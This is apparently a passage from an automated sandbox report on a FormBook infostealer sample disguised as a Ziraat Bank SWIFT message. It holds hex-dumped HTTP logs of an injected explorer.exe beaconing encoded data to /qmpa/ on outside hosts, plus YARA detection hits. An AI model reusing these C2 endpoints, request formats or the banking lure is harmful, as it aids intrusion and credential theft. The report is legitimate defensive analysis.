e6 8d ae e6 9f a5 e7 9c 8b e8 af a5 e7 9b ae e5 bd 95 e6 88 96 e9 a1 b5 e7 9a 84 e6 9d 83 e9 99 90 e3 80 82 0a 3c 68 72 3e 0a 3c 70 3e e8 af b7 e5 b0 9d e8 af 95 e4 bb a5 e4 b8 8b e6 93 8d e4 bd 9c ef bc 9a 3c 2f 70 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e e5 a6 82 e6 9e 9c e6 82 a8 e8 ae a4 e4 b8 ba e8 87 aa e5 b7 b1 e5 ba 94 e8 af a5 e8 83 bd e5 a4 9f e6 9f a5 e7 9c 8b e8 af a5 e7 9b ae e5 bd 95 e6 88 96 e9 a1 b5 e9 9d a2 ef bc 8c e8 af b7 e4 b8 8e e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e8 81 94 e7 b3 bb e3 80 82 3c 2f 6c 69 3e 0a 3c 6c 69 3e e5 8d 95 e5 87 bb 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 22 3e e5 88 b7 e6 96 b0 3c 2f 61 3e e6 8c 89 e9 92 ae ef bc 8c e5 b9 b6 e4 bd bf e7 94 a8 e5 85 b6 e4 bb 96 e5 87 ad e6 8d ae e9 87 8d e8 af 95 e3 80 82 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 68 32 3e 48 54 54 50 20 e9 94 99 e8 af af 20 34 30 31 2e 31 20 2d 20 e6 9c aa e7 bb 8f e6 8e 88 e6 9d 83 ef bc 9a e8 ae bf e9 97 ae e7 94 b1 e4 ba 8e e5 87 ad e6 8d ae e6 97 a0 e6 95 88 e8 a2 ab e6 8b 92 e7 bb 9d e3 80 82 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 e4 bf a1 e6 81 af e6 9c 8d e5 8a a1 20 28 49 49 53 29 3c 2f 68 32 3e 0a 3c 68 72 3e 0a 3c 70 3e e6 8a 80 e6 9c af e4 bf a1 e6 81 af ef bc 88 e4 b8 ba e6 8a 80 e6 9c af e6 94 af e6 8c 81 e4 ba ba e5 91 98 e6 8f 90 e4 be 9b ef bc 89 3c 2f 70 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e e8 bd ac e5 88 b0 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 6c 69 6e 6b 69 64 3d 38 31 38 30 22 3e 4d 69 63 72 6f 73 6f 66 74 20 e4 ba a7 e5 93 81 e6 94 af e6 8c 81 e6 9c 8d e5 8a a1 3c 2f 61 3e e5 b9
                                                                  Data Ascii: 55f<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE></TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=utf-8"><STYLE type="text/css"> BODY { font: 9pt/12pt } H1 { font: 12pt/15pt } H2 { font: 9pt/12pt } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1></h1><hr><p></p><ul><li></li><li><a href="javascript:location.reload()"></a></li></ul><h2>HTTP 401.1 - <br>Internet (IIS)</h2><hr><p></p><ul><li> <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft </a>
                                                                  Nov 21, 2022 10:59:27.609448910 CET145INData Raw: b6 e6 90 9c e7 b4 a2 e5 8c 85 e6 8b ac e2 80 9c 48 54 54 50 e2 80 9d e5 92 8c e2 80 9c 34 30 31 e2 80 9d e7 9a 84 e6 a0 87 e9 a2 98 e3 80 82 3c 2f 6c 69 3e 0a 3c 6c 69 3e e6 89 93 e5 bc 80 e2 80 9c 49 49 53 20 e5 b8 ae e5 8a a9 e2 80 9d ef bc 88
                                                                  Data Ascii: HTTP401</li><li>IIS IIS (inetmgr) </li><


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.749719103.11.189.18980C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Nov 21, 2022 10:59:33.059086084 CET146OUTPOST /qmpa/ HTTP/1.1
                                                                  Host: www.oaksinstitute.net
                                                                  Connection: close
                                                                  Content-Length: 193
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.oaksinstitute.net
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Accept: */*
                                                                  Referer: http://www.oaksinstitute.net/qmpa/
                                                                  Accept-Language: en-US
                                                                  Accept-Encoding: gzip, deflate
                                                                  Data Raw: 33 66 2d 54 36 6e 49 3d 30 61 48 4d 32 53 52 43 32 57 74 51 34 71 63 70 31 61 68 6c 38 43 63 78 6f 4f 6a 79 36 71 30 6a 28 53 62 46 31 42 42 5a 37 53 32 58 54 6c 79 6e 37 48 64 32 67 63 61 5a 4f 6f 7e 34 36 44 61 42 57 6c 52 4d 54 49 42 67 36 41 41 75 45 43 4b 33 5a 37 36 6e 62 45 53 67 34 30 67 31 35 7a 74 4b 74 6e 7a 76 4e 6f 42 6c 4f 45 53 30 6d 46 45 5a 56 59 47 65 6d 57 70 67 4c 65 42 6a 65 2d 62 39 76 71 50 59 42 50 7e 34 38 4a 48 50 49 6b 69 73 6c 63 62 4f 74 44 6d 64 62 6f 73 59 6a 61 55 64 6e 6e 6e 76 33 46 51 64 7e 59 37 75 39 54 78 41 6a 47 50 48 4a 42 34 2e 00 00 00 00 00 00 00 00
                                                                  Data Ascii: 3f-T6nI=0aHM2SRC2WtQ4qcp1ahl8CcxoOjy6q0j(SbF1BBZ7S2XTlyn7Hd2gcaZOo~46DaBWlRMTIBg6AAuECK3Z76nbESg40g15ztKtnzvNoBlOES0mFEZVYGemWpgLeBje-b9vqPYBP~48JHPIkislcbOtDmdbosYjaUdnnnv3FQd~Y7u9TxAjGPHJB4.
                                                                  Nov 21, 2022 10:59:33.240129948 CET147INHTTP/1.1 200 OK
                                                                  Date: Mon, 21 Nov 2022 09:59:33 GMT
                                                                  Server: Apache
                                                                  X-Powered-By: PHP/5.6.40
                                                                  Connection: close
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 32 39 61 0d 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 3e 0a 09 3c 74 72 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 09 09 3c 74 64 20 69 64 3d 22 6e 65 77 2d 62 6f 78 22 3e 3c 68 33 3e 2a 2e 6e 65 74 20 69 73 20 61 20 72 65 67 69 73 74 65 72 65 64 20 64 6f 6d 61 69 6e 2e 3c 62 72 3e 0a 09 09 54 68 69 73 20 69 73 20 61 20 70 6c 61 63 65 68 6f 6c 64 65 72 20 66 6f 72 20 74 68 65 20 77 65 62 73 69 74 65 2e 3c 2f 74 64 3e 0a 09 3c 2f 74 72 3e 0a 09 3c 74 72 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 09 09 3c 74 64 3e 49 66 20 79 6f 75 20 77 6f 75 6c 64 20 6c 69 6b 65 20 74 6f 20 3c 73 74 72 6f 6e 67 3e 68 6f 73 74 20 61 20 77 65 62 73 69 74 65 3c 2f 73 74 72 6f 6e 67 3e 20 2f 20 3c 73 74 72 6f 6e 67 3e 6f 62 74 61 69 6e 20 61 20 70 65 72 73 6f 6e 61 6c 69 73 65 64 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 3c 2f 73 74 72 6f 6e 67 3e 20 2f 20 3c 73 74 72 6f 6e 67 3e 6c 69 6e 6b 20 75 70 20 74 6f 20 47 6f 6f 67 6c 65 20 61 70 70 73 3c 2f 73 74 72 6f 6e 67 3e 2e 20 44 6f 20 67 65 74 20 69 6e 20 74 6f 75 63 68 20 77 69 74 68 20 75 73 2e 3c 62 72 3e 0a 09 09 20 56 6f 64 69 65 6e 20 6f 66 66 65 72 73 20 53 69 6e 67 61 70 6f 72 65 20 68 6f 73 74 65 64 20 73 65 72 76 65 72 73 20 66 6f 72 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 6f 64 69 65 6e 2e 63 6f 6d 2f 22 3e 53 69 6e 67 61 70 6f 72 65 20 57 65 62 20 48 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 6f 64 69 65 6e 2e 63 6f 6d 2f 73 69 6e 67 61 70 6f 72 65 2d 65 6d 61 69 6c 2d 68 6f 73 74 69 6e 67 2e 70 68 70 22 3e 53 69 6e 67 61 70 6f 72 65 20 45 6d 61 69 6c 20 48 6f 73 74 69 6e 67 3c 2f 61 3e 20 73 65 72 76 69 63 65 73 2e 3c 2f 74 64 3e 0a 09 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 0d 0a
                                                                  Data Ascii: 29a<head><meta name="robots" content="noindex, nofollow"></head><table width="100%" height="100%"><tr align="center"><td id="new-box"><h3>*.net is a registered domain.<br>This is a placeholder for the website.</td></tr><tr align="center"><td>If you would like to <strong>host a website</strong> / <strong>obtain a personalised email address</strong> / <strong>link up to Google apps</strong>. Do get in touch with us.<br> Vodien offers Singapore hosted servers for <a href="http://www.vodien.com/">Singapore Web Hosting</a> and <a href="http://www.vodien.com/singapore-email-hosting.php">Singapore Email Hosting</a> services.</td></tr></table>
                                                                  Nov 21, 2022 10:59:33.240156889 CET147INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.749720103.11.189.18980C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Nov 21, 2022 10:59:35.276971102 CET148OUTGET /qmpa/?3f-T6nI=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImnXlyB2HME2hA2u33jFcxbHUjt&j6=hfNT HTTP/1.1
                                                                  Host: www.oaksinstitute.net
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Nov 21, 2022 10:59:35.466799021 CET149INHTTP/1.1 200 OK
                                                                  Date: Mon, 21 Nov 2022 09:59:35 GMT
                                                                  Server: Apache
                                                                  X-Powered-By: PHP/5.6.40
                                                                  Connection: close
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 32 39 61 0d 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 3e 0a 09 3c 74 72 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 09 09 3c 74 64 20 69 64 3d 22 6e 65 77 2d 62 6f 78 22 3e 3c 68 33 3e 2a 2e 6e 65 74 20 69 73 20 61 20 72 65 67 69 73 74 65 72 65 64 20 64 6f 6d 61 69 6e 2e 3c 62 72 3e 0a 09 09 54 68 69 73 20 69 73 20 61 20 70 6c 61 63 65 68 6f 6c 64 65 72 20 66 6f 72 20 74 68 65 20 77 65 62 73 69 74 65 2e 3c 2f 74 64 3e 0a 09 3c 2f 74 72 3e 0a 09 3c 74 72 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 09 09 3c 74 64 3e 49 66 20 79 6f 75 20 77 6f 75 6c 64 20 6c 69 6b 65 20 74 6f 20 3c 73 74 72 6f 6e 67 3e 68 6f 73 74 20 61 20 77 65 62 73 69 74 65 3c 2f 73 74 72 6f 6e 67 3e 20 2f 20 3c 73 74 72 6f 6e 67 3e 6f 62 74 61 69 6e 20 61 20 70 65 72 73 6f 6e 61 6c 69 73 65 64 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 3c 2f 73 74 72 6f 6e 67 3e 20 2f 20 3c 73 74 72 6f 6e 67 3e 6c 69 6e 6b 20 75 70 20 74 6f 20 47 6f 6f 67 6c 65 20 61 70 70 73 3c 2f 73 74 72 6f 6e 67 3e 2e 20 44 6f 20 67 65 74 20 69 6e 20 74 6f 75 63 68 20 77 69 74 68 20 75 73 2e 3c 62 72 3e 0a 09 09 20 56 6f 64 69 65 6e 20 6f 66 66 65 72 73 20 53 69 6e 67 61 70 6f 72 65 20 68 6f 73 74 65 64 20 73 65 72 76 65 72 73 20 66 6f 72 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 6f 64 69 65 6e 2e 63 6f 6d 2f 22 3e 53 69 6e 67 61 70 6f 72 65 20 57 65 62 20 48 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 6f 64 69 65 6e 2e 63 6f 6d 2f 73 69 6e 67 61 70 6f 72 65 2d 65 6d 61 69 6c 2d 68 6f 73 74 69 6e 67 2e 70 68 70 22 3e 53 69 6e 67 61 70 6f 72 65 20 45 6d 61 69 6c 20 48 6f 73 74 69 6e 67 3c 2f 61 3e 20 73 65 72 76 69 63 65 73 2e 3c 2f 74 64 3e 0a 09 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 0d 0a
                                                                  Data Ascii: 29a<head><meta name="robots" content="noindex, nofollow"></head><table width="100%" height="100%"><tr align="center"><td id="new-box"><h3>*.net is a registered domain.<br>This is a placeholder for the website.</td></tr><tr align="center"><td>If you would like to <strong>host a website</strong> / <strong>obtain a personalised email address</strong> / <strong>link up to Google apps</strong>. Do get in touch with us.<br> Vodien offers Singapore hosted servers for <a href="http://www.vodien.com/">Singapore Web Hosting</a> and <a href="http://www.vodien.com/singapore-email-hosting.php">Singapore Email Hosting</a> services.</td></tr></table>
                                                                  Nov 21, 2022 10:59:35.466834068 CET149INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.74972168.66.216.1280C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Nov 21, 2022 10:59:40.741662979 CET150OUTPOST /qmpa/ HTTP/1.1
                                                                  Host: www.thetrendsinfo.com
                                                                  Connection: close
                                                                  Content-Length: 193
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.thetrendsinfo.com
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Accept: */*
                                                                  Referer: http://www.thetrendsinfo.com/qmpa/
                                                                  Accept-Language: en-US
                                                                  Accept-Encoding: gzip, deflate
                                                                  Data Raw: 33 66 2d 54 36 6e 49 3d 78 68 64 71 48 4c 6d 55 68 58 6f 42 4e 65 46 51 50 7a 51 4e 34 63 75 77 6a 30 57 4d 51 56 7e 65 46 6c 61 76 34 4b 6e 66 77 50 67 72 28 50 32 6e 54 30 30 54 55 6b 67 59 39 41 32 77 77 47 45 70 36 79 33 77 42 37 69 4b 73 78 33 35 43 2d 37 6a 57 31 30 67 6f 38 53 68 4f 53 46 73 4c 67 54 75 4b 59 28 4c 36 62 79 43 30 58 44 30 75 56 46 69 56 75 73 50 49 69 54 71 6e 43 35 46 4e 45 6f 6c 52 6f 35 67 67 4a 4e 70 61 4d 72 31 6c 33 63 43 48 48 6a 51 52 66 71 59 30 36 41 42 42 34 78 4d 6a 59 35 71 79 6b 55 57 45 66 39 6f 73 66 41 31 78 7a 37 77 4e 76 73 2e 00 00 00 00 00 00 00 00
                                                                  Data Ascii: 3f-T6nI=xhdqHLmUhXoBNeFQPzQN4cuwj0WMQV~eFlav4KnfwPgr(P2nT00TUkgY9A2wwGEp6y3wB7iKsx35C-7jW10go8ShOSFsLgTuKY(L6byC0XD0uVFiVusPIiTqnC5FNEolRo5ggJNpaMr1l3cCHHjQRfqY06ABB4xMjY5qykUWEf9osfA1xz7wNvs.
                                                                  Nov 21, 2022 10:59:40.866710901 CET151INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 708
                                                                  date: Mon, 21 Nov 2022 09:59:40 GMT
                                                                  server: LiteSpeed
                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                  x-frame-options: SAMEORIGIN
                                                                  x-content-type-options: nosniff
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.74972268.66.216.1280C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Nov 21, 2022 10:59:42.892518044 CET152OUTGET /qmpa/?3f-T6nI=8j1KE/HWtHcnH+pEPE5HkfDOmxDyQ368aF2j+bbJwew9gPbmW2dVDlZv4ybx5W4m8jPtBYTEvz/PBOnDTGQZn8CJHCh1MhyDPKi16ua84ged&j6=hfNT HTTP/1.1
                                                                  Host: www.thetrendsinfo.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Nov 21, 2022 10:59:43.017709970 CET153INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 708
                                                                  date: Mon, 21 Nov 2022 09:59:42 GMT
                                                                  server: LiteSpeed
                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                  x-frame-options: SAMEORIGIN
                                                                  x-content-type-options: nosniff
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:10:57:37
                                                                  Start date:21/11/2022
                                                                  Path:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe
                                                                  Imagebase:0x2a0000
                                                                  File size:707584 bytes
                                                                  MD5 hash:775849A9C9B3CBFD14A9920690F62859
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.265449053.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Target ID:1
                                                                  Start time:10:57:46
                                                                  Start date:21/11/2022
                                                                  Path:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe
                                                                  Imagebase:0xe40000
                                                                  File size:707584 bytes
                                                                  MD5 hash:775849A9C9B3CBFD14A9920690F62859
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.373374321.0000000001780000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Target ID:2
                                                                  Start time:10:57:49
                                                                  Start date:21/11/2022
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff75ed40000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.341390351.000000000DF40000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
